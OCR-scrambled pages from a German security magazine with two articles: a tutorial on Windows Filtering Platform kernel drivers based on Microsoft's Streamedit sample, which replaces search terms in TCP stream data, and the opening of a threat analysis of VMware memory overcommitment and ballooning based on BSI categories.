MmBuildMdlForNonPagedPool( dert sich in drei Teile. Die stream_callout.c ist für das
gStringToReplaceMdl Laden, Initialisieren und Entladen des Treibers verant-
); wortlich. Die beiden Teile inline_edit.c und oob_edit.c
sind die verschiedenen Implementierungen zum Durch-
Listing 2. WFP Injection-Handle suchen und Ersetzen der Netzwerkdaten, wovon hier
lediglich die Inline-Variante betrachtet wird.
status = FwpsInjectionHandleCreate( Die WFP bietet im Allgemeinen zwei verschiedene
AF _ UNSPEC, Ansätze zum Filtern von Netzwerkdaten an. Einmal
FWPS _ INJECTION _ TYPE _ STREAM, können die Netzwerkdaten direkt im Durchfluss durch
&gInjectionHandle den Filter gefiltert werden, welches als inline edit be-
); zeichnet wird und in der inline_edit.c des Beispiels rea-
lisiert ist. Die andere Methode, welche in der oob_edit.c
deverzeichnisse das WDK-Unterverzeichnis inc\ddk des Beispiels implementiert ist, filtert die Netzwerkdaten
und bei Bibliotheksverzeichnisse das WDK-Unterver- out-of-band. Bei diesem Verfahren klont der Filter die
zeichnis lib\win7\i386 hinzugefügt werden. Letzteres ist bei ihm eintreffenden Netzwerkdaten und blockiert die
abhängig von der verwendeten Windowsversion. Hier ursprünglichen, sodass der betreffende Shim sie nach
wird Windows 7 x86 verwendet. Nach den Ergänzun- Verlassen der KMFE nicht zurück in den TCP/IP-Stack
gen sollte Visual Studio alle Quellen kennen. Sollten leitet und somit verwirft. Die geklonten Daten werden

Abbildung 3. Sequenzdiagramm – Stream-Daten-Filterung mittels WFP.

hakin9.org/de 13
SICHERHEITSANWENDUNGEN

dann untersucht und ggf. später wieder in den TCP/IP- Um eine MDL im späteren Verlauf in die Netzwerkda-
Stack injiziert. Nach der erneuten Injektion setzen sie ten einfügen zu können, wird seitens der WFP ein Injec-
ihren Weg durch den Stack fort. Bevor allerdings näher tion-Handle benötigt. Listing 2 stammt aus Zeile 609 der
auf die Filterung eingegangen wird, müssen die Filter stream_callout.c.
erst mal beim Start des Kernel-Mode Treiber initialisiert Die Funktion FwpsInjectionHandleCreate zum Erstellen
werden. eines Injektion-Handle erwartet als ersten Parameter
die TCP/IP-Protokollversion, für die es Daten injizie-
Initialisierung des Treibers ren soll. AF_UNSPEC steht hierbei sowohl für IPv4 als auch
Jeder Treiber muss über zwei Funktionen verfügen: IPv6. AF_UNSPEC ist allerdings nur für Injektionen auf dem
DriverEntry und DriverUnload. DriverEntry ist hierbei der Transport-Layer und Stream-Layer möglich. Für alle an-
Einstiegspunkt beim Starten des Treibers, gleichzuset- deren Layer innerhalb der KMFE muss explizit ange-
zen mit der Funktion int main(int argc, char* argv[]) und geben werden, ob der Handle für IPv4 (AF_INET) oder
DriverUnload die Funktion, die aufgerufen wird, wenn der IPv6 (AF_INET6) erstellt werden soll. Da hier im zweiten
Treiber beendet wird. Parameter der Stream-Layer mittels FWPS_INJECTION_TYPE_
Im Streamedit-Beispiel werden innerhalb der STREAM ausgewählt wird, kann AF_UNSPEC verwendet wer-
DriverEntry-Funktion die üblichen Initialisierungen des den.
Treibers vollzogen, auf die hier nicht weiter eingegan-
gen wird. Der erste wichtige WFP-Punkt im Stream- Kontakt zur Filter Engine
edit-Beispiel ist der, wo Speicherplatz in Form einer Um Filter und ihre Subkomponenten über die Schnitt-
Memory Decriptor List (MDL) zum Ersetzen des gefun- stellen der BFE oder KMFE hinzufügen zu können,
denen Wortes reserviert wird. Das nachfolgende Listing wird eine Verbindung dorthin benötigt. Eine solche
stammt aus Zeile 562 der stream_callout.c. Verbindung zur BFE oder KMFE wird, wie beim In-
Einhergehend mit dem Next generation network driver jection-Handle, durch einen Handle repräsentiert. Im
stack hat Microsoft in NDIS 6.0 das Datenformat inner- Streamedit-Beispiel wurde dieser Teil in der Funktion
halb des Windows Netzwerkstack grundlegend erneu- StreamEditRegisterCallout zusammengefasst. Listing 3
ert. Seither werden alle Daten, die über das Netzwerk zeigt den Verbindungsaufbau zur KMFE und bezieht
versendet oder empfangen werden, in NET_BUFFER_LIST sich auf die Zeile 265 der stream_callout.c.
(NBL)-Ketten verpackt. Wie in Abbildung 4 dargestellt, Mittels der Funktion FwpmEngineOpen wird ein Engine-
bestehen diese Ketten aus einer verketteten Anzahl an Handle erstellt. Hierbei ist vor allem der vierte Para-
NET_BUFFER (NB)-Strukturen und diese schlussendlich meter von Interesse. Durch die Session ist es möglich,
aus den MDL-Strukturen, wovon eine in der DriverEn- die Lebensdauer der installierten Filter zu definieren. In
try-Funktion des Streamedit-Beispiels erstellt wird. Die diesem Beispiel wird die Session mit dem FWPM_SESSION_
Erstellung geschieht vor dem Hintergrund, dass im spä- FLAG_DYNAMIC Flag versehen. Das bedeutet, dass alle Ob-
teren Verlauf die MDL des Suchwortes gegen die MDL jekte, die innerhalb des aktuellen Engine-Handle instal-
des Ersetzungswortes ausgetauscht und somit das liert werden, nur solange in der KMFE verbleiben, wie
Wort selber ausgetauscht wird. die Session und der Treiber laufen. Wird der Treiber be-

Abbildung 4. Datenstrukturen der Netzwerkdaten ab NDIS 6.0. Quelle: [8]

14 1/2011
Windows Filtering Platform Netzwerkdatenfilterung unter Windows

endet, werden alle WFP-Objekte des Treibers automa- beiten auf dem Stream-Layer der KMFE. Sie haben
tisch aus der KMFE entfernt. die Bedingung, dass sie lediglich Netzwerkdaten auf
Unter den Filtern und ihren Subkomponenten, die zur Quell- oder Ziel-Port 5001 filtern sollen. Das Listing 4
KMFE hinzugefügt werden sollen, existieren oftmals Ab- zeigt nicht die generische Implementierung der Funkti-
hängigkeiten. Deswegen muss im weiteren Verlauf des on wie im Streamedit-Beispiel, sondern wie sie konkret
Listing 3 eine Transaktion mittels FwpmTransactionBegin die einzelnen Parameter des Filters und des Callouts
gestartet werden. Die Transaktion garantiert, wie bei für den IPv4-Filter setzt, damit diese nachfolgend nä-
einer Datenbank-Transaktion, dass alle Objekte erfolg- her betrachtet werden können. Dies ist vergleichbar mit
reich hinzugefügt werden oder im Fehlerfall kein Objekt dem Aufruf der RegisterCalloutForLayer aus Zeile 291. Im
hinzugefügt wird. Die Fehlerbehandlung wurde in den nachfolgenden Listing wurde die Filterbedingung aus
Listings dieses Artikels aus Platzgründen ausgelassen, Platzgründen ausgelassen. Es wird hier auf die MSDN-
findet sich aber im Streamedit-Beispiel. Referenz verwiesen[9].
Das Listing 4 lässt sich thematisch in zwei Teile teilen.
Erstellen der Filter Einerseits die Registrierung des Callout am Anfang und
Mittels der Funktion RegisterCalloutForLayer werden im im späteren Verlauf die Erstellung des Filters, der den
Streamedit-Beispiel nicht nur, wie der Name vermuten Callout nutzt. Damit ein Callout in der KMFE registriert
lässt, Callouts auf einem Layer registriert. Diese Funk- werden kann, muss dieser drei Anforderungen erfül-
tion ist die zentrale WFP-Konfigurationsfunktion des len. Erstens muss er eindeutig identifizierbar sein, was
Beispiels. In ihr werden die eigentlichen WFP-Kompo- durch einen Globally Unique Identifier (GUID) erfolgt.
nenten erstellt und der KMFE hinzugefügt. Im Stream- Als Zweites und Drittes muss er zwei Funktionszeiger
edit-Beispiel werden durch die Funktion zwei Filter samt besitzen. Die Funktionszeiger müssen auf Funktionen
Bedingung und ihrem Callout erstellt. Beide Filter ar- zeigen, die der Filter aufgerufen kann und in denen die

Listing 4. Callout- und Filter-Erstellung FWPM_SUBLAYER_UNIVERSAL;


// Teil 1: Register Callout filter.weight.type = FWP_EMPTY;
FWPS_CALLOUT sCallout = {0}; status = FwpmFilterAdd(
// 1. ¡ gEngineHandle,
sCallout.calloutKey = &filter,
STREAM_EDITOR_STREAM_CALLOUT_V4; NULL,
NULL);
sCallout.classifyFn =
StreamInlineEditClassify; // 2. Listing 5. MDL Konvertierung
sCallout.notifyFn =
StreamEditNotify; // 3. FwpsCopyStreamDataToBuffer(
streamData,
status = FwpsCalloutRegister( (BYTE*)streamEditor->scratchBuffer
deviceObject, + streamEditor->dataLength,
&sCallout, streamData->dataLength,
calloutId &bytesCopied
); );
Listing 6. Daten-Injektion
status = FwpsStreamInjectAsync(…)
// Teil 2: Register Filter …
FWPM_FILTER filter = {0}; ioPacket->streamAction =
FWPS_STREAM_ACTION_NONE;
filter.layerKey =
FWPM_LAYER_STREAM_V4; ioPacket->countBytesEnforced =
findLength;
filter.action.type =
FWP_ACTION_CALLOUT_TERMINATING; classifyOut->actionType =
FWP _ ACTION _ BLOCK;
filter.action.calloutKey =
STREAM_EDITOR_STREAM_CALLOUT_V4;
filter.subLayerKey =

hakin9.org/de 15
SICHERHEITSANWENDUNGEN

Datenbehandlung und Entscheidungsfindung stattfin- de. Zu beachten ist jedoch, dass je mehr Daten ein Fil-
det. Es gibt einmal die classify-Funktion (classifyFn), der ter filtern muss, desto ressourcenintensiver ist er. Aus
der Filter alle Netzwerkdaten zur benutzerdefinierten diesem Grund sollte die Layer-Wahl wohl bedacht sein,
Filterung übergibt und von der der Filter die Filter-Ent- um den Netzwerkstack nicht auszubremsen.
scheidung erwartet. Die andere Funktion ist die notify- Über das Strukturelement action.type wird der Filter-
Funktion (notifyFn). Diese wird von der KMFE aufgeru- typ festgelegt. Im Beispiel ist es ein Typ, der dem Filter
fen, sobald ein Filter hinzugefügt oder entfernt wird, der erlaubt ein Block oder ein Permit an die KMFE zurück
den Callout verwendet. Diese kann zur Initialisierung zu geben. Andere Typen sind beispielsweise für Filter,
Callout-interner Strukturen verwendet werden. die die Daten lediglich inspizieren und nicht verändern.
Die Registrierung eines Filters ist im Gegensatz zum Ein solcher Filter hätte dann als Type FWP_ACTION_CALLOUT_
Callout etwas aufwendiger. Als erstes wird über das INSPECTION. Manche Typen lassen sich lediglich dann
layerKey Strukturelement angegeben, auf welchem KM- auswählen, wenn der Filter über einen Callout verfügt.
FE-Layer der Filter arbeiten soll. Da die KMFE über 70 Um einen Filter mit einem Callout zu verbinden, muss
verschiedene Layer[4] besitzt, hat der Entwickler die das Strukturelement calloutKey des Filters, wie in Lis-
Qual der Wahl, den für seine Filterung richtigen zu fin- ting 4, mit der GUID des Callouts versehen werden.
den. Innerhalb der KMFE gibt es Layer, wie im voran ge- In diesem Beispiel werden lediglich zwei Filter ins-
gangenen Listing der FWPM_LAYER_STREAM_V4 Stream-Layer, talliert, die auf unterschiedlichen IP-Protokollversionen
die von allen TCP Netzwerkdaten durchlaufen werden. arbeiten. Sie sind nicht voneinander abhängig und be-
Sie eignen sich, wie im Streamedit-Beispiel ersichtlich, einflussen oder ergänzen sich nicht gegenseitig. Aus
sehr gut zur Payload-Filterung. Andererseits gibt es diesem Grund reicht es, wenn beide Filter einfach dem
Layer, wie dem FWPM_LAYER_ALE_FLOW_ESTABLISHED_V4, des- universellen Sublayer zugeordnet werden und eine FWP_
sen Filter lediglich einmalig dann von der KMFE aufge- EMPTY-Gewichtung besitzen. Sie sorgt für eine zufällige
rufen werden, wenn eine TCP/IPv4-Verbindung mittels Gewichtung innerhalb des gewählten Sublayer. Sol-
des Three-Way-Handshake vollständig hergestellt wur- len sich hingegen zwei Filter gegenseitig ergänzen, so

Abbildung 5. Ablauf der String-Ersetzung mittels Injektion.

16 1/2011
Windows Filtering Platform Netzwerkdatenfilterung unter Windows

müssen sie mittels ihrer Gewichtung und dem Sublayer, ClassifyFn-Funktion extrahieren lässt. Es ist lediglich er-
der auch eine Gewichtung besitzt, in die richtige abstei- forderlich, dass zuvor ausreichend viel Speicher allo-
gend sortierte Aufrufreihenfolge gebracht werden. Es kiert wurde, in den der Payload kopiert wird. Die Größe
kann an dieser Stelle leider nicht näher auf die Gewich- des Puffers lässt sich ebenfalls aus der zuvor genann-
tung eingegangen werden, da sie sehr umfangreich ist. ten Datenstruktur auslesen.
Weitere Informationen finden sich dazu in der WFP-Do- Sobald die Daten in den Byte-Puffer überführt wur-
kumentation[10]. den, ist es relativ leicht ihn auf gewisse Inhalte hin zu
überprüfen. Wie in Zeile 240 in der Datei inline_edit.c
Filterung der Netzwerkdaten ersichtlich ist, wird der Byte-Puffer Byte für Byte durch-
Im Listing 4 wurde der Funktionszeiger der classifyFn laufen und mittels RtlCompareMemory mit dem Suchein-
auf StreamInlineEditClassify gesetzt. Dies ist nun auch trag verglichen. Wurde der Sucheintrag im Byte-Puffer
die Einstiegsfunktion zur Netzwerkdatenfilterung. Sie gefunden, wird in Zeile 257 der Datei inline_edit.c der
befindet sich in Zeile 413 der inline_edit.c. Die Signatur KMFE durch den Strukturschlüssel countBytesEnforced
der Classify-Funktion eines Callouts hat sich zwischen mitgeteilt, dass sie die Daten bis zum Suchtreffer wei-
Windows Vista und Windows 7 geändert, sodass, falls tersenden darf. Sobald die Funktion des Callout be-
beide Betriebssysteme unterstützt werden sollen, dort endet ist, führt die KMFE die Aktion aus und ruft den
eine Preprozessor-Unterscheidung gemacht werden Callout mit den Restdaten erneut auf. Diesmal steht
muss. Die Funktion ist im Streamedit-Beispiel sehr ein- der Sucheintrag direkt am Anfang. Der Callout springt
fach gehalten und prüft lediglich die Datenflussrichtung deswegen direkt zum Injection-Handle und injiziert die
der zu untersuchenden Netzwerkdaten. Der Stream- MDL des Ersatzworts in den Netzwerkpfad. Das Listing
Layer, auf dem der Filter arbeitet, ist ein bidirektiona- 6 zeigt einen Ausschnitt des Injektionsvorgangs.
ler Filter-Layer. Das bedeutet, dass dem Callout sowohl Sobald die Dateninjektion erfolgreich war und der Er-
Netzwerkdaten übergeben werden, die gesendet als satzeintrag versendet wurde, werden, wie zuvor über
auch empfangen werden. In dem Beispiel wird aller- countBytesEnforced, der KMFE mitgeteilt, dass nun genau
dings nur eine Richtung gefiltert, was in den Konfigura- findLength an Bytes verarbeitet werden sollen. Als Akti-
tionen in Zeile 66 der stream_callout.c Datei eingestellt on wird FWP_ACTION_BLOCK angegeben, sodass die Daten,
werden kann. die genau den Sucheintrag enthalten, blockiert wer-
Die Filterung erfolgt in diesem Beispiel auf dem den. Nachdem die ClassifyFn-Routine des Callout be-
Stream-Layer der KMFE. Dies hat den Hintergrund, endet ist, führt die KMFE die Aktion erneut aus und ruft
dass sich hier die NBL sehr komfortabel in einen Byte- die Funktion mit den Restdaten wieder auf. Nun kann
Puffer konvertieren lässt. Das Listing 5 zeigt einen Aus- die Suche von neuem beginnen. Die drei Schritte sind
schnitt der Funktion StreamCopyDataForInspection, welche nachfolgend in Abbildung 5 mittels eines Sequenzdia-
in Zeile 531 in der Datei stream_callout.c definiert ist. grammes veranschaulicht. Bei diesem Beispiel werden
Der Funktion wird die Struktur FWPS_STREAM_DATA0 über- die Daten GET search?q=rainy&hl=de nach dem Ein-
geben, welche sich aus dem Parameter layerData der trag rainy durchsucht und dieser durch sunny ersetzt.

Abbildung 6. Streamedit-Ergebnis anhand von Google.

hakin9.org/de 17
SICHERHEITSANWENDUNGEN

Im Internet:
[1] Einstiegsseite zur Windows Filtering Platform: http://msdn.microsoft.com/en-us/library aa366510%28v=VS.85%29.aspx
[2] Transport Driver Interface (TDI): http://msdn.microsoft.com/en-us/library/ms819740.aspx
[3] Architekturbild der WFP: http://msdn.microsoft.com/en-us/library/aa366509%28v=VS.85%29.aspx
[4] Liste der ca. 70 Filter Layer der WFP: http://msdn.microsoft.com/en-us/library/aa366492%28v=VS.85%29.aspx
[5] Windows Driver Kit (WDK): http://www.microsoft.com/whdc/devtools/wdk/wdkpkg.mspx
[6] WFP Streamedit-Beispiel: http://msdn.microsoft.com/en-us/library/ff571071%28VS.85%29.aspx
[7] Kompilerfehler Visual Studio 2010 unter Windows 7 http://forums.peerblock.com/read.php?3,6884,6887#msg-6887
[8] NDIS 6.0 Datenstrukturabbildung: http://msdn.microsoft.com/en-us/library/ff568355%28v=VS.85%29.aspx
[9] WFP Filterbedingungen: http://msdn.microsoft.com/en-us/library/aa363994%28v=VS.85%29.aspx
[10] WFP Filter- und Sublayer-Gewichtung: http://msdn.microsoft.com/en-us/library/aa364008%28v=VS.85%29.aspx

Umstellen des Port Datei ausgewählt werden. Danach kann der Treiber in
Um den Filter einfacher testen zu können, sollte die Va- der Eingabeaufforderung mittels des Befehls net start
riable configInspectionPort in Zeile 65 der Datei stream_ stmedit gestartet und mittels net stop stmedit wieder ge-
callout.c auf den Wert 80, was dem HTTP Port ent- stoppt werden. Sobald der Treiber läuft, kann vergleich-
spricht, geändert werden sowie die beiden Variablen in bares wie in Abbildung 6 erzeugt werden. Eingegeben
den Zeilen darunter auf TRUE. Durch die Änderung auf wird rainy und google sucht nach sunny.
Port 80 lassen sich die Filter, wie in Abbildung 4 zu se-
hen, einfach mittels einer Browser-Anfrage testen. Über Fazit
die beiden anderen Variablen wird eingestellt, dass die Die Windows Filtering Platform[1] ist eine sehr mäch-
Filter die ausgehenden Netzwerkdaten filtern und dazu tige und einheitliche Plattform zum Filtern der Netz-
die erläuterte inline_edit Methode verwenden. werkdaten unter Windows Vista, Windows 7, Windows
Server 2008 und zukünftigen Windows-Versionen. Sie
Kompilieren und Starten bietet ca. 70 verschiedene Layer an, auf denen Filter
Das WDK-Streamedit-Beispiel lässt sich mittels der die gesamten oder einen speziell ausgewählten Teil der
Build-Umgebungen des WDK kompilieren. Wenn das Netzwerkdaten des jeweiligen Netzwerkprotokolls fil-
WDK installiert ist, finden sich im Startmenü unter dem tern können. Die hier vorgestellte inline_edit-Methode
Eintrag Windows Driver Kits die Build Environments. Zu zum Filtern der Netzwerkdaten ist die einfachere und
beachten ist, dass die x64-Versionen von Windows eine schnellere Variante. Innerhalb dieser Variante wird die
Treibersignatur verlangen. Die WDK-Beispiele lassen Untersuchung direkt in den Daten, die den TCP/IP-
sich deswegen nur unter der x64-Version starten, wenn Stack passieren, vollzogen und ggf. Teile der Daten,
beim Starten von Windows über das F8-Startmenü die die nicht versendet oder empfangen werden sollen,
Treibersignatur temporär deaktiviert wird. Es ist gene- blockiert. Die hier nicht besprochene out-of-band-Filte-
rell empfehlenswert, Treiber in einer virtuellen Umge- rung, die in der oob_edit.c enthalten ist, ist um einiges
bung zu testen, um Schäden am Hauptsystem zu ver- umfangreicher. Sie klont die Daten des TCP/IP-Stack
meiden. und blockiert die originalen Daten. Die geklonten Da-
Zur Kompilierung muss die zum Zielsystem passende ten können dann beispielsweise aus dem Kernel-Mode
Checked-Build-Umgebung gestartet werden. Diese ist zurück in den User-Mode gereicht und dort untersucht
ein einfaches Kommandozeilenprogramm. Es muss da- werden ohne, dass der Netzwerkstack während der Un-
mit in das betreffende Quellcodeverzeichnis gewechselt tersuchung blockiert wie es bei der inline_edit-Methode
werden und dann lediglich build eingegeben werden. der Fall wäre.
Dann wird im Zuge der Kompilierung ein neues Unter-
verzeichnis im Quellcodeverzeichnis angelegt, in dem
sich der Treiber als *.sys-Datei befindet. Um den WFP-
Filter nun zu starten, muss er zuerst installiert werden. RENÉ ESPENHAHN
Dies geschieht über die *.inf-Datei im Quellcodever- Der Autor ist Masterstudent im Studiengang Informatik – Ver-
zeichnis, die bislang außer Acht gelassen wurde. Wenn teilte und Mobile Anwendungen im Fachbereich I&I der Hoch-
mittels der rechten Maustaste auf die *.inf-Datei geklickt schule Osnabrück. Nebenberuflich ist er selbstständiger Soft-
wird, erscheint im Kontextmenü der Eintrag Installieren, wareentwickler. Er ist Administrator und erster Entwickler der
über den der Treiber im System installiert werden kann. Motorradplattform SVrider.de.
Sobald auf diesen Kontextmenüeintrag geklickt wurde, Kontakt mit dem Autor:
fragt Windows nach dem Ort, wo sich der Treiber be- Rene.Espenhahn@hs-osnabrueck.de
findet. Hier muss im neuen Unterverzeichnis die *.sys- Rene@svrider.de

18 1/2011
PRAXIS

Schwachstellen bei der


Ressourcenoptimierung
im virtuellen Raum
Steve Hampicke
Die Virtualisierung von physischen Systemen gewinnt mehr
und mehr an Bedeutung. Mittlerweile ein alter Hase unter
den Virtualisierungsarten ist die Servervirtualisierung.
Sie hat sich bereits in Unternehmen und Behörden
etabliert und verdrängt erfolgreich die „alte“ physische
Serverstruktur.

IN DIESEM ARTIKEL ERFAHREN SIE… WAS SIE VORHER WISSEN SOLLTEN…


• Grundlagen zu den Speicherfunktionen (Memory Overcom- • Grundkenntnisse zum Thema Virtualisierung allgemein
mitment, Ballooning) der Virtualisierungslösung VMware • Grundkenntnisse zum Thema Sicherheit
vSphere 4
• Sicherheitsanalyse der oben genannten Funktionen auf Basis
des Bausteins der Virtualisierung vom Bundesamt für Sicher-
heit in der Informationstechnik (BSI)

Untersuchung sicherheitsrelevanter

U
nternehmen und Behörden versprechen sich
durch den Einsatz der Virtualisierung Kostenein- Eigenschaften von Memory Overcommitment
sparungen durch eine Reduzierung der Server- und Ballooning
Hardware, Senkung der Energie und Minimierung des Aktuell eine der am meisten verwendeten Servervirtuali-
benötigten Platzes im Rechenzentrum. Doch die Virtua- sierungslösungen kommt von der Firma VMware und ist
lisierung von Servern bringt durch die neuen Techniken momentan in der Version vSphere 4 erhältlich. Die Lösung
auch zusätzliches Gefahrenpotential gegenüber physi- besteht hauptsächlich aus dem ESX- und einem Verwal-
schen Servern mit sich. tungsserver (vCenter Server) und nutzt Technologien wie

Abbildung 1. „total” Memory Overcommitment

20 1/2011
Schwachstellen bei der Ressourcenoptimierung im virtuellen Raum

Snapshots, Memory Overcommitment oder das Ballooning. gewonnen werden und welche auf die virtuelle Festplatte
Administratoren wird dadurch eine Vielzahl an Planungs- auszulagern sind. Der durch den Balloon- Treiber beleg-
und Konfigurationsmöglichkeiten für den Einsatz der neuen te Speicherplatz wird durch den Hypervisor erkannt und
Technik geboten. Zunächst eine kurze Einführung. kann nun an andere virtuelle Systeme vergeben werden.
Das Memory Overcommitment, die Überbuchung des Der Ablauf ist in Abbildung 3 dargestellt. Speicherengpäs-
Arbeitsspeichers, ist ein wichtige Technologie bei der Ar- se können so kurzzeitig ausgeglichen werden.
beit mit virtuellen Welten. Da sie mit einer Speicherma-
nagementtechnik des ESX(i) realisiert wird, kann die vir- Vorgehensweise:
tuelle Maschine mehr Speicher nutzen, als physisch
vorhanden ist. Mit dem „totalen“ Memory Overcommit- • Balloon-Treiber belegt Speicher
ment und dem „aktiven“ Memory Overcommitment gibt es • Balloon-Treiber markiert belegten Speicher
zwei Arten. Unter „total“ Overcommitment versteht man, • Gast kann anderen Speicher zurückfordern
was gemeinhin als Memory Overcommitment bezeich- • Balloon-Treiber teilt Hypervisor mit, welcher Spei-
net wird. Es ergibt sich aus der Summe des konfigurierten cher ihm zugeteilt ist
Speichers der virtuellen Maschinen und durch den verfüg- • Hypervisor macht den zugeteilten Speicher frei
baren Host-Speicher für die virtuellen Maschinen (Abb. 1). • Hypervisor besitzt nun mehr freien physischen
Die zweite Art, das „aktive“ Memory Overcommit- Speicher
ment, ergibt sich aus der Summe des aktiven Speichers
der virtuellen Maschinen. Ist das Ergebnis größer Eins, Mithilfe des Parameters sched.mem.maxmemctl kann
so besteht eine hohe Wahrscheinlichkeit, dass es zu die Summe des Speichers bestimmt werden, die vom
einem Leistungsabfall der virtuellen Maschine kommt Balloon-Treiber maximal eingenommen werden kann.
(Abbildung 2). Tritt dieser hohe Leistungsabfall auf, soll- Dieser Parameter kann mittels vSphere Client geän-
te die virtuelle Maschine mittels vMotion auf einen an- dert werden. Eine Anwendungsempfehlung hierfür ist:
deren Host übertragen werden.
Da der Reservierungsparameter eine große Bedeu- • Auf allen virtuellen Maschinen sollten die VMwa-
tung in diesem System hat, sollte er von Anfang an ge- reTools installiert werden und das Ballooning akti-
schickt gewählt werden. Er sollte immer den komplet- viert werden.
ten aktiven Speicher im physischen Speicher haben, • Das Gast-Betriebssystem sollte außerdem genug
um somit eine gute Performance erreichen zu können. Platz für die Auslagerungsdatei besitzen.
Der Speicher, der sich im Leerlauf befindet und der freie
Speicher können durch das Ballooning genutzt werden. Potentielle Gefahren
Ballooning-Technik ermöglicht eine dynamische Anpas- Die Auswirkungen der Servervirtualisierung auf admi-
sung der virtuellen Umgebung. Dies geschieht durch den nistrative und betriebliche Prozesse können beträcht-
Balloon-Treiber (vmmemctl), der durch die VMwareTools lich sein. Aus der Sicherheitsperspektive betrachtet,
in das jeweilige Betriebssystem einer virtuellen Maschine bringen die neuen Techniken, wie das Memory Over-
integriert wird. Der Treiber belegt gezielt den Hauptspei- commitment und Ballooning, ein zusätzliches Gefah-
cher, der vom Gast-Betriebssystem am wenigsten benutzt renpotential gegenüber physischen Servern mit sich.
wird. Das Gast-Betriebssystem muss nun seinen eigenen So werden zum Beispiel zunehmend mehr firmenkriti-
Speicherverwaltungsalgorithmus nutzen. Sollte der Spei- sche Anwendungen in einer virtuellen Umgebung be-
cher zu knapp sein, wird festgelegt, welche Seiten zurück- trieben. Welche Virtualisierungssoftware dabei von den

Abbildung 2. “aktives” Memory Overcommitment

hakin9.org/de 21
PRAXIS

Unternehmen genutzt wird, hat ITIC und Stratus unter- Anwendungen in einer virtuellen Maschine auch vom
sucht und dabei herausgefunden, dass 71 Prozent der Hersteller der Anwendungssoftware unterstützt wer-
Unternehmen die Software von VMware einsetzt. 28 den. Möglicherweise kann es passieren, dass der Her-
Prozent setzten auf Microsoft und 9 Prozent wenden steller keinen Support anbietet, sobald das Produkt in
Virtualisierungslösungen von Citrix an. Laut einer aktu- einer virtuellen Umgebung betrieben wird. Ist dies ge-
ellen Umfrage von ITIC und Stratus, bei der 500 IT-Ex- klärt, kommt die Wahl der Virtualisierungssoftware und
perten aus 19 Ländern befragt wurden, gaben 42% an, in diesem Zusammenhang, die Auswahl des richtigen
dass ein Viertel bis zur Hälfte der Anwendungen in ihren Servers. Dabei spielt die Planung der Kommunikati-
Unternehmen unternehmenskritisch seien. Bei PC-WA- onsverbindungen zum Server eine wichtige Rolle. Die
RE beobachten wir einen ähnlichen Trend. In 78% der Entwicklung einer Strategie für das Netz- und System-
Unternehmen laufen diese kritischen Anwendungen auf management ist ebenfalls nicht außer Acht zu lassen.
virtuellen Maschinen. Um deren Sicherung gewährleis- Für den richtigen Umgang mit den einzelnen Planungs-
ten zu können, ist es für jeden IT-Manager essentiell zu schritten empfehlen sich die IT-Grundschutz- Kataloge
wissen, wo Gefahrenquellen liegen können. des BSI. Sie listen die einzelnen Gefährdungen und die
Das Bundesamt für Sicherheit in der Informations- dazu passenden Gegenmaßnahmen auf und vermitteln
technik (BSI) gibt hierzu folgende Gefährdungsbereiche so einen sicheren IT-Betrieb.
in virtuellen Infrastrukturen an:
Menschliches Fehlverhalten
• Organisatorische Mängel Menschliche Fehlhandlungen sind immer eine Gefah-
• Menschliches Fehlverhalten renquelle innerhalb von IT Infrastrukturen und deren
• Technisches Versagen Management. Häufig werden Konfigurationen unzu-
• Vorsätzliche Handlungen reichend getestet oder Administratoren unzureichend
ausgebildet. Die Zugangsrechte zu virtuellen Maschi-
In der Abbildung 4 ist eine Art zusammenfassendes nen und deren Anwendungen sollten nur in dem Um-
Angriffsszenario zu sehen. fang eingeräumt werden, wie sie für die Erfüllung der
Aufgaben erforderlich sind. Dabei kann eine fehlerhafte
Organisatorische Mängel Administration der Rechte zu Betriebsstörungen und Si-
Da virtuelle Infrastrukturen meist eine hohe Komplexi- cherheitslücken führen.
tät aufweisen, sind eine gute Planung sowie eine Ana- In Verbindung mit dem Ballooning gibt es die Gefahr,
lyse der Rahmenbedingungen unausweichlich. Bereits dass Benutzer die Gastwerkzeuge beenden und somit
hier können potentielle Gefahren entstehen. Bevor man den Balloon-Treiber deaktivieren. Dies kann zu einem
an die richtige Auswahl des Virtualisierungsservers Speicherengpass der virtuellen Maschinen führen. Im
denkt, ist es wichtig zu wissen, ob die einzusetzenden Normalfall kann nur die Gruppe der Administratoren die

Abbildung 3. Ballooning-Verfahren

22 1/2011
Schwachstellen bei der Ressourcenoptimierung im virtuellen Raum

Gastwerkzeuge beenden. So kann in einem Windows- sourcenparameter in den Konfigurationsdateien än-


System nur der Administrator die Dienste im Taskmana- dern, um nur eine Auswahl möglicher Eingriffe zu nen-
ger beenden oder den TASKKILL-Befehl in die Konsole nen. Eine explizite Sicherung der Konsole ist damit un-
eingeben. In einem Linux- System wird meist der kill- erlässlich und wird deshalb im folgenden Abschnitt
Befehl genutzt, um Prozesse zu beenden. Dieser kann noch einmal näher betrachtet.
jedoch nur mit dem sudo-Kommando gestartet werden,
dass das Wissen des Root-Passwortes voraussetzt. Missbräuchliche Nutzung von
Gastwerkzeugen in virtuellen Maschinen
Technisches Versagen Um die Überbuchungstechnik des Memory Overcom-
Als technisches Versagen wird meist der Ausfall von mitment und das dazugehörige Ballooning optimal ein-
Diensten in einer virtuellen Umgebung bezeichnet. Zu- zusetzen, empfiehlt es sich, die Gastwerkzeuge (VM-
dem fallen laut BSI noch Störungen der Netzinfrastruk- wareTools) zu installieren. Sie werden mit sehr hohen
tur von Virtualisierungsservern, der Ausfall von Verwal- Berechtigungen ausgeführt, um systemnah arbeiten zu
tungsservern sowie der Ausfall von virtuellen Maschinen können. Dadurch bekommt man die Möglichkeit, eine
durch nichtbeendete Datensicherungsprozesse in die Überbuchung des Hauptspeichers zwischen dem Hy-
Gefahrenklasse des technischen Versagens. pervisor und den virtuellen Maschinen zu koordinieren.

Vorsätzliche Handlung Maßnahmen


Wohl am schwersten einzuschätzen, sind die Gefah- Die vorangegangene Analyse des Memory Overcom-
ren, die sich aus vorsätzlichen Handlungen ergeben. mitment und Ballooning zeigt, welche Gefahren bei de-
Sie können sich von einem harmlosen Rahmen bis hin ren Einsatz entstehen können. Die Empfehlungen aus
zu einer verheerenden Situation bewegen. Die vorsätz- dem BSI IT-Grundschutzkatalogen bieten eine gute
lichen Handlungen können dabei als folgende Aktionen Grundlage, um ein ausgereiftes Sicherheitskonzept für
auftreten: virtuelle Welten zu erstellen. Fassen wir die wichtigsten
zusammen.
• Angriffe gegen das Management (Servicekonsole)
• Angriffe gegen den Hypervisor Planung der virtuellen Infrastruktur
• Angriffe gegen das Gast-Betriebssystem Eine sorgfältige Planung ist wie in allen Projekten es-
